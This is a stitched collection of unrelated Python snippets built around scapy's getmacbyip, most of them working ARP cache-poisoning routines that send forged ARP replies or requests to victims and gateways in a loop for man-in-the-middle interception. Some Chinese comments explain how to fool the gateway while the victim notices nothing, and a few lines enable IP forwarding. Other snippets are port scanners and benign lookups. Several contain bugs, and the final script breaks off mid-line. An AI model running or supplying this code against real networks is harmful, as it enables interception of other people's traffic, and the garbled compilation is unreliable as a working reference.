def cmd_arpoison(t1, t2, verbose):
"""ARP cache poison"""
conf.verb = False
mac1 = getmacbyip(t1)
mac2 = getmacbyip(t2)
pkt1 = Ether(dst=mac1) / ARP(op="is-at", psrc=t2, pdst=t1, hwdst=mac1)
pkt2 = Ether(dst=mac2) / ARP(op="is-at", psrc=t1, pdst=t2, hwdst=mac2)
try:
while 1:
sendp(pkt1)
sendp(pkt2)
if verbose:
pkt1.show2()
pkt2.show2()
else:
print(pkt1.summary())
print(pkt2.summary())
time.sleep(1)
except KeyboardInterrupt:
pass
def get_target_mac_by_ip(target):
print ("[*] Resolving target's mac address. If this takes more than"
" a few seconds, check if the target can be reached on the network.")
target_mac = getmacbyip(target)
while not target_mac:
target_mac = getmacbyip(target)
print "[*] Success!"
return target_mac
def cmd_arp_poison(victim1, victim2, iface, verbose):
"""Send ARP 'is-at' packets to each victim, poisoning their
ARP tables for send the traffic to your system.
Note: If you want a full working Man In The Middle attack, you need
to enable the packet forwarding on your operating system to act like a
router. You can do that using:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Example:
\b
# habu.arpoison 192.168.0.1 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
...
"""
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error(
'Interface {} not found. Use habu.interfaces to show valid network interfaces'
.format(iface))
return False
mac1 = getmacbyip(victim1)
mac2 = getmacbyip(victim2)
pkt1 = Ether(dst=mac1) / ARP(
op="is-at", psrc=victim2, pdst=victim1, hwdst=mac1)
pkt2 = Ether(dst=mac2) / ARP(
op="is-at", psrc=victim1, pdst=victim2, hwdst=mac2)
try:
while 1:
sendp(pkt1)
sendp(pkt2)
if verbose:
pkt1.show2()
pkt2.show2()
else:
print(pkt1.summary())
print(pkt2.summary())
time.sleep(1)
except KeyboardInterrupt:
pass
def rearp(signal, frame):
sleep(1)
print '\n[*] Re-arping network'
rearp_mac = getmacbyip(host)
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(psrc=host, hwsrc=rearp_mac, op=2)
sendp(pkt, inter=1, count=5, iface=options.interface)
if options.reverse:
r_rearp_mac = getmacbyip(options.target)
r_pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(psrc=options.target, hwsrc=r_rearp_mac, op=2)
sendp(r_pkt, inter=1, count=5, iface=options.interface)
sys.exit(0)
def rearp(signal, frame):
sleep(1)
print '\n[*] Re-arping network'
rearp_mac = getmacbyip(host)
pkt = Ether(src=rearp_mac, dst='ff:ff:ff:ff:ff:ff') / ARP(psrc=host, hwsrc=mac, op=2)
sendp(pkt, inter=1, count=5, iface=options.interface)
if options.reverse:
r_rearp_mac = getmacbyip(options.target)
r_pkt = Ether(src=r_rearp_mac, dst='ff:ff:ff:ff:ff:ff') / ARP(psrc=options.target, hwsrc=mac, op=2)
sendp(r_pkt, inter=1, count=5, iface=options.interface)
sys.exit(0)
def rearp(signal, frame):
sleep(1)
print '\n[*] Re-arping network'
rearp_mac = getmacbyip(args[0])
pkt = Ether(src=rearp_mac, dst='ff:ff:ff:ff:ff:ff') / ARP(psrc=args[0], hwsrc=mac, op=2)
sendp(pkt, inter=1, count=5, iface=options.interface)
sys.exit(0)
def __init__(self, iface="eth0", wireless=False, DEBUG=False, log=False):
self.iface = iface
self.mac = get_if_hwaddr(self.iface)
try:
self.pub_ip = gu.get_pub_ip()
except:
print "Not connected to the internet.." # I still don't see it as much of a problem
try:
self.gateway = gu.get_default_gateway()
except:
raise Exception("noDefGateway")
self.poison_pid = 0
self.router_mac = getmacbyip(self.gateway)
self.wireless = wireless # currently this flag needs to be set manually (during obj init or obj.wireless = True)
self.debug = DEBUG # un-shutthefuckups scapy and prints internal values
self.log = log
if self.debug:
print self.iface
print self.mac
print self.gateway
print self.router_mac
print self.wireless
conf.verb = 3
if self.log:
with open("/var/log/fun&games.log", "a") as f:
f.write("Started a session on ip: " + self.pub_ip + " at " +
str(datetime.now()) + "\n")
def getRTSPcamstatus(request):
"""
Get RTSP camera status
"""
token = get_authorization_header(request).decode("utf-8")
" token_list[0] is either Basic or Bearer token_list[1] is actual token "
token_list = token.split(" ")
try:
" If it is a JWT token, then check if this is still valid "
if "Bearer" in token_list:
obj = get_object_or_404(AccessToken, access_token=token_list[1])
if not obj.valid:
raise PermissionDenied()
else:
" Get the originator & update last_used date "
obj.last_used = datetime.datetime.now()
obj.save()
elif "Basic" in token_list:
originator = request.user
except:
raise PermissionDenied()
rtsp_cameras_on_network = [
item.get("id")
for item in settings.CONFIG.get("local", {}).get("rtsp_camera", [])
if getmacbyip(item.get("ip")) != None
]
return Response(rtsp_cameras_on_network, status=status.HTTP_200_OK)
def get_mac(ip):
# arp_request = scapy.ARP(pdst = ip)
# broadcast = scapy.Ether(dst ="ff:ff:ff:ff:ff:ff")
# arp_request_broadcast = broadcast / arp_request
# answered_list = scapy.srp(arp_request_broadcast, timeout = 5, verbose = False)[0]
# return answered_list[0][1].hwsrc
return scapy.getmacbyip(ip)
def report_ports(self, target, ports):
ans,unans = sr(IP(dst=target)/TCP(sport=self.sport, dport=ports, flags=self.scanType),timeout=self.timeout, iface=self.iface)
for s,r in ans:
if not r.haslayer(ICMP):
try:
self.mac[r.src] = getmacbyip(r.src)
except:
self.mac[r.src] = "ff:ff:ff:ff:ff"
self.add_data_to_kb(r.src + "_mac", self.mac[r.src])
if r.payload.flags == 0x12:
self.opened[r.sport] = r.src
self.gom.echo(" Discovered open port " + str(r.sport))
self.add_data_to_kb(r.src + "_tcp_ports", r.sport)
for s,r in ans:
if r.haslayer(ICMP):
self.closed[r.dport] = r.dst
elif r.payload.flags != 0x12:
self.closed[r.dport] = r.dst
self.results = self.opened
return True
def report_ports(self, target, ports):
ans,unans = sr(IP(dst=target)/TCP(sport=self.sport, dport=ports, flags=self.scanType),timeout=self.timeout, iface=self.iface)
for s,r in ans:
if not r.haslayer(ICMP):
try:
self.mac[r.src] = getmacbyip(r.src)
except:
self.mac[r.src] = "ff:ff:ff:ff:ff"
self.addToDict(r.src + "_mac", self.mac[r.src])
if r.payload.flags == 0x12:
self.opened[r.sport] = r.src
self.gom.echo( " Discovered open port " + str(r.sport) )
self.addToDict(r.src + "_tcp_ports", r.sport)
for s,r in ans:
if r.haslayer(ICMP):
self.closed[r.dport] = r.dst
elif r.payload.flags != 0x12:
self.closed[r.dport] = r.dst
self.results = self.opened
return True
def build_req():
"""
以请求包的方式进行欺骗,目的是欺骗网关,让网关把所有的数据给为发一份,同时,被害主机毫无察觉。
"""
gateway_mac = getmacbyip(args[0])
if options is None: #广播欺骗
pkt = Ether(src=msc,dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=mac,psrc=options.target,hwdst=gateway_mac,pdst=args[0],op=1)
elif options.target: #定向欺骗
target_mac = getmacbyip(options.target)
if target_mac is None:
print "[-] Error: Could not resolve targets MAC address"
sys.exit(1)
pkt = Ether(src=mac,dst=gateway_mac)/ARP(hwsrc=mac,psrc=args[0],hwdst=target_mac,pdst=options.target,op=1)
# 本数据包封装了一个数据包,从本机发送给网关, ARP 的内容是谁知道,
# 这里欺骗的受骗主机
return pkt
def report_ports(self, target, ports):
ans,unans = sr(IP(dst=target)/TCP(sport=self.sport, dport=ports, flags=self.stype),timeout=self.timeout, iface=self.iface)
for s,r in ans:
if not r.haslayer(ICMP):
try:
self.mac[r.src] = getmacbyip(r.src)
except:
self.mac[r.src] = "ff:ff:ff:ff:ff"
self.addToDict(r.src + "_mac", self.mac[r.src])
if self.stype == self.SYN_SCAN:
if r.payload.flags == 0x12:
self.opened[r.sport] = r.src
self.addToDict(r.src + "_tcp_ports", r.sport)
elif self.stype == self.ACK_SCAN:
if s[TCP].dport == r[TCP].sport:
#print str(s[TCP].dport) + " is unfiltered"
self.opened[r.sport] = r.src
self.addToDict(r.src + "_tcp_ports", r.sport)
for s,r in ans:
if r.haslayer(ICMP):
self.closed[r.dport] = r.dst
elif r.payload.flags != 0x12:
self.closed[r.dport] = r.dst
self.results = self.opened
return True
def report_ports(self, target, ports):
ans, unans = sr(IP(dst=target) /
TCP(sport=self.sport, dport=ports, flags=self.stype),
timeout=self.timeout,
iface=self.iface)
for s, r in ans:
if not r.haslayer(ICMP):
try:
self.mac[r.src] = getmacbyip(r.src)
except:
self.mac[r.src] = "ff:ff:ff:ff:ff"
self.addToDict(r.src + "_mac", self.mac[r.src])
if self.stype == self.SYN_SCAN:
if r.payload.flags == 0x12:
self.opened[r.sport] = r.src
self.addToDict(r.src + "_tcp_ports", r.sport)
elif self.stype == self.ACK_SCAN:
if s[TCP].dport == r[TCP].sport:
#print str(s[TCP].dport) + " is unfiltered"
self.opened[r.sport] = r.src
self.addToDict(r.src + "_tcp_ports", r.sport)
for s, r in ans:
if r.haslayer(ICMP):
self.closed[r.dport] = r.dst
elif r.payload.flags != 0x12:
self.closed[r.dport] = r.dst
self.results = self.opened
return True
def get_mac(target_ip):
target_mac = getmacbyip(target_ip)
if target_mac is not None:
return target_mac
else:
print(f'无法获取IP为{target_ip}的主机MAC地址,请检查目标IP是否存活.')
exit(0)
def get_mac_address(ip_address):
# broadcast_layer = scapy.Ether(dst='ff:ff:ff:ff:ff:ff')
# arp_layer = scapy.ARP(pdst=ip_address)
# get_mac_packet = broadcast_layer/arp_layer
# answer = scapy.srp(get_mac_packet, timeout=2, verbose=False)[0]
# return answer[0][1].hwsrc
return scapy.getmacbyip(ip_address)
def cmd_arp_poison(victim1, victim2, iface, verbose):
"""Send ARP 'is-at' packets to each victim, poisoning their
ARP tables for send the traffic to your system.
Note: If you want a full working Man In The Middle attack, you need
to enable the packet forwarding on your operating system to act like a
router. You can do that using:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Example:
\b
# habu.arpoison 192.168.0.1 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
...
"""
conf.verb = False
if iface:
conf.iface = iface
mac1 = getmacbyip(victim1)
mac2 = getmacbyip(victim2)
pkt1 = Ether(dst=mac1)/ARP(op="is-at", psrc=victim2, pdst=victim1, hwdst=mac1)
pkt2 = Ether(dst=mac2)/ARP(op="is-at", psrc=victim1, pdst=victim2, hwdst=mac2)
try:
while 1:
sendp(pkt1)
sendp(pkt2)
if verbose:
pkt1.show2()
pkt2.show2()
else:
print(pkt1.summary())
print(pkt2.summary())
time.sleep(1)
except KeyboardInterrupt:
pass
def dotransform(request, response):
nexthop = conf.route6.route(request.value)[2] if ':' in request.value else conf.route.route(request.value)[2]
e = IPv4Address(nexthop)
e.internal = True
if ':' not in nexthop:
e += Field('ethernet.hwaddr', getmacbyip(nexthop), displayname='Hardware Address')
response += e
return response
def __init__(self, ip, mac=None):
self.ip = ip
if mac:
self.mac = mac
else:
self.mac = net.getmacbyip(ip)
if not self.mac:
raise PermissionError("Couldn't find MAC address of %s" % ip)
def run(self):
if self.target == "":
self.gom.echo( "No target specified" )
return False
self.mac = getmacbyip(self.target)
self.addToDict(self.target + "_mac", self.mac)
self.addToDict(self.target + "_mac_vendor", getMacVendor(self.mac))
return True
def run(self):
if self.target == "":
self.gom.echo("No target specified")
return False
self.mac = getmacbyip(self.target)
self.addToDict(self.target + "_mac", self.mac)
self.addToDict(self.target + "_mac_vendor", getMacVendor(self.mac))
return True
def build_rep():
if options.target is None:
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], op=2)
elif options.target:
target_mac = getmacbyip(options.target)
if target_mac is None:
print "[-] Error: Could not resolve targets MAC address"
sys.exit(1)
pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target,op=2)
return pkt
def build_rep():
if options.target_ip is None:
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=options.gatewayip, op=2)
elif options.target_ip:
target_mac = getmacbyip(options.target_ip)
if target_mac is None:
print("[-] Error: Could not resolve targets MAC address.")
sys.exit(1)
pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=options.gatewayip, hwdst=target_mac, pdst=options.target_ip, op=2)
return pkt
def arp_poison(interface, target, gateway):
local_mac = get_if_hwaddr(interface)
target_mac = getmacbyip(target)
gateway_mac = getmacbyip(gateway)
print 'local_mac = {} target_mac = {} gateway_mac = {}'\
.format(local_mac, target_mac, gateway_mac)
if not all((local_mac, target_mac, target_mac)):
print 'Fail to Get MAC Address, Please Check the Arguments'
sys.exit(0)
packet_t = Ether(src=local_mac, dst=target_mac) \
/ ARP(hwsrc=local_mac, psrc=gateway, hwdst=target_mac, pdst=target, op=2)
packet_g = Ether(src=local_mac, dst=gateway_mac) \
/ ARP(hwsrc=local_mac, psrc=target, hwdst=gateway_mac, pdst=gateway, op=2)
try:
while True:
sendp(packet_t, inter=2, iface=interface)
sendp(packet_g, inter=2, iface=interface)
time.sleep(1)
except KeyboardInterrupt:
sys.exit(0)
def build_rep():
if options.target is None:
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], op=2)
elif options.target:
target_mac = getmacbyip(options.target)
if target_mac is None:
print "[-] Error: Could not resolve targets MAC address"
sys.exit(1)
pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target, op=2)
return pkt
def rep():
if options.target is None:
print 'Require the target IP'
elif options.target:
target_mac = getmacbyip(options.target)
gateway_mac = getmacbyip(args[0])
mac = get_if_hwaddr(options.interface)
if target_mac is None:
print 'Target not alive'
exit(1)
kpt1 = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac,
psrc=args[0],
hwdst=target_mac,
pdst=options.target,
op=2) #伪装网关欺骗主机
kpt2 = Ether(src=mac, dst=gateway_mac) / ARP(hwsrc=mac,
psrc=options.target,
hwdst=gateway_mac,
pdst=args[0],
op=2) #伪装主机欺骗网关
return (kpt1, kpt2)
def scan(self, ipaddr):
"""Scans network and catches active IPs."""
if getmacbyip(
ipaddr) is None: # checks if host's MAC cannot be resolved
pass
else: # checks if host is online (for assurance)
icmp = IP(dst=ipaddr) / ICMP() # icmp packet to send
ans = sr1(icmp, timeout=5,
verbose=self.verbose) # sending a request
if ans:
self.res.append(ipaddr) # keeping an answered host's IP
def rearp_targets(signal, frame):
"""Function to rearp targets when SIGNINT signal is fired.
Arguments:
signal {signal} -- Signal
frame {frame} -- Stack frame or execution frame
"""
sleep(1)
p_success("\n[+] Rearping Targets")
r_mac = getmacbyip(host)
pkt = Ether(src=r_mac, dst="ff:ff:ff:ff:ff:ff") / ARP(
psrc=host, hwsrc=if_mac, op=2)
sendp(pkt, inter=1, count=3, iface=interface)
if args.reverse:
t_mac = getmacbyip(args.target)
r_pkt = Ether(src=t_mac, dst="ff:ff:ff:ff:ff:ff") / ARP(
psrc=args.target, hwsrc=if_mac, op=2)
sendp(r_pkt, inter=1, count=2, iface=interface)
p_success("[+] Exiting!")
sys.exit(0)
def dotransform(request, response):
nexthop = conf.route6.route(
request.value)[2] if ':' in request.value else conf.route.route(
request.value)[2]
e = IPv4Address(nexthop)
e.internal = True
if ':' not in nexthop:
e += Field('ethernet.hwaddr',
getmacbyip(nexthop),
displayname='Hardware Address')
response += e
return response
def build_req(): #构造请求数据包
if options.target is None:
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(
hwsrc=mac, psrc=args[0], pdst=args[0])
elif options.target:
target_mac = getmacbyip(options.target)
if target_mac is None:
print("[-] Error: 无法获取目标ip的mac地址")
sys.exit(1)
pkt = Ether(src=mac, dst=target_mac) / ARP(
hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
return pkt
def build_req():
if target_ip is None:
# 若无目标地址,则广播数据包
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=gatewayip, op=1)
elif target_ip:
target_mac = getmacbyip(target_ip)
if target_mac is None:
print("[-] Error: Could not resolve targets MAC address.")
sys.exit(1)
pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=gatewayip, hwdst=target_mac, pdst=target_ip, op=1)
return pkt
def build_rep(target, host):
if target is None:
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(
hwsrc=mac, psrc=host, op=2)
elif target:
print("[-] Obtaining mac from {}".format(target))
target_mac = None
while not target_mac:
target_mac = getmacbyip(target)
pkt = Ether(src=mac, dst=target_mac) / ARP(
hwsrc=mac, psrc=host, hwdst=target_mac, pdst=target, op=2)
return pkt
def build_req():
if options.target is None:
pkg = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(
hwsrc=mac, psrc=args[0], pdst=args[0])
elif options.target:
target_mac = getmacbyip(options.target)
if target_mac is None:
print 'can not find this mac'
sys.exit(1)
pkg = Ether(src=mac, dst=target_mac) / ARP(
hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
return pkg
def scanner(ip):
global collected
print_lock.acquire()
collected += 1
sys.stdout.write("\r Progress: {} of {}\t({:.1f}%)".format(
collected, len(ips), collected / len(ips) * 100))
sys.stdout.flush()
print_lock.release()
mac = scapy.getmacbyip(ip)
if mac:
hosts.append(Address(ip, mac))
def build_req():
if options.target is None:
pkt = Ether(src=mac, dst="ff:ff:ff:ff:ff:ff") / ARP(
hwsrc=mac, psrc=args[0], pdst=args[0])
elif options.target:
# 获取目标机mac地址
target_mac = getmacbyip(options.target)
if target_mac is None:
print("[-] Error: Could not resolve targets MAC address")
sys.exit(1)
# 构造数据包
pkt = Ether(src=mac, dst=target_mac) / ARP(
hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
return pkt
def build_req():
"""
以请求包的方式进行欺骗,目的是欺骗网关,让网关把所有的发给被害主机的数据给为本机发一份,同时被害主机毫无察觉。
"""
gateway_mac = getmacbyip(args[0])
if options is None: # 广播欺骗
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(
hwsrc=mac,
psrc=options.target,
hwdst=gateway_mac,
pdst=args[0],
op=1)
elif options.target: # 定向欺骗
target_mac = getmacbyip(options.target)
if target_mac is None:
print "[-] Error: Could not resolve targets MAC address"
sys.exit(1)
pkt = Ether(src=mac, dst=gateway_mac) / ARP(hwsrc=mac,
psrc=options.target,
hwdst=gateway_mac,
pdst=args[0],
op=1)
return pkt
def build_rep():
"""
以回应包的形式,只是在欺骗被攻击的主机,网关的mac是我这台主机的mac。
"""
if options.target is None: #广播欺骗 骗所有人
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], op=2)
elif options.target: #广播欺骗 骗指定的人
target_mac = getmacbyip(options.target)
if target_mac is None:
print "[-] Error: Could not resolve targets MAC address"
sys.exit(1)
pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target, op=2)
# 本机mac 受欺骗的主机mac 本机mac 网关的ip地址 被攻击人的mac 被攻击人的ip OP值是表示请求还是回应
# 1:请求 2:回应
# 从本机发往受欺骗主机, 内容是网关的mac是本机。
return pkt
def build_rep():
if data['ff'] == '1':
#op=1(请求包) op=2(响应包)
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(
hwsrc=mac, psrc=data['luan_ip'], op=2)
elif data['ff'] == '0':
target_mac = getmacbyip(data['target_ip'])
if target_mac is None:
print("\033[33m[E] Error: 无法解析目标MAC地址\033[0m")
sys.exit(1)
pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac,
psrc=data['luan_ip'],
hwdst=target_mac,
pdst=data['target_ip'],
op=2)
return pkt
run = True
def signal_handler(signum, frm):
global run
run = False
signal.signal(signal.SIGINT, signal_handler)
parser = argparse.ArgumentParser(description='arpspoof - intercept packets on a switched LAN')
parser.add_argument('-t','--target', help="Host to ARP poison", type=str, required=True)
parser.add_argument('-v','--victim', help="Host to intercept packets for the local gateway", type=str, required=True)
args = parser.parse_args()
tmac = getmacbyip(args.target)
vmac = getmacbyip(args.victim)
hmac = ARP().hwsrc
tip = args.target
vip = args.victim
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
while run:
print "%s %s arp replay %s is-at %s" % (hmac, tmac, vip, hmac)
pkt = Ether()/ARP(op="who-has", psrc=vip, pdst=tip)
sendp(pkt, inter=1, verbose=0)
else: